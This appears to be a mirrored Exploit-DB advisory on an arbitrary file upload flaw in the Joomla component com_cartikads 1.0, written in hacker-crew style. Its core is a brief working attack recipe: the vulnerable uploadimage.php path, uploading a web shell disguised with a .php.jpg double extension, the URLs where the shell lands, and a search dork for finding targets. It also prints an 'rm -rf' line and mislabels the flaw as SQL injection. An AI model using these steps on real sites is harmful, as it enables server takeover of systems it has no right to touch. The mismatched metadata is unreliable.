Joomla! Component com_cartikads 1.0 – Arbitrary File Upload

• Exploit Database
• 10 阅读

• 作者： kaMtiEz
  日期： 2010-01-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/10984/

• ###################################################################################
  #
  [~] Joomla components com_cartikadsRemote File Upload vulnerability #
  [~] Author	: kaMtiEz (kamzcrew@yahoo.com)#
  [~] Homepage	: http://www.indonesiancoder.com#
  [~] Date	: January 02, 2009#
  #
  ###################################################################################
  
  [ Software Information ]
  
  [+] Vendor : http://www.cartikahosting.com
  [+] Download : -
  [+] version : 1.0
  [+] Vulnerability : SQL injection
  [+] Dork : "Think iT"
  [+] Price : dunno
  [+] Location : INDONESIA - JOGJA
  [+] description : Cartikads is a Mambo Open Source ads management component.
  
  ##################################################################################
  
  
  [ HERE WE GO .. LIVE FROM JOGJA CITY ]
  
  [ Vulnerable File ]
  
  http://server/[kaMtiEz]/components/com_cartikads/uploadimage.php
  
  [ NOTE ]
  
  upload with extension shell.php.jpg
  
  your shell will be
  
  http://server/[kaMtiEz]/images/stories/shell.php.jpg
  
  http://server/[kaMtiEz]/images/banners/shell.php.jpg
  
  
  ===========================================================================
  
  [ Thx TO ]
  [+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
  [+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry ..
  [+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah
  [+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
  
  [ NOTE ] 
  
  [+] Nyak ama babe gua .. tak lupa adik gua ..
  [+] tukulesto : where did u go ??
  [+] Dengerin Radio yach di http://antisecradio.fm :D
  
  [ QUOTE ]
  
  [+] rm -rf 
  
  [ EOF ]
  
  [+] INDONESIANOCODER TEAM
  [+] KILL -9 TEAM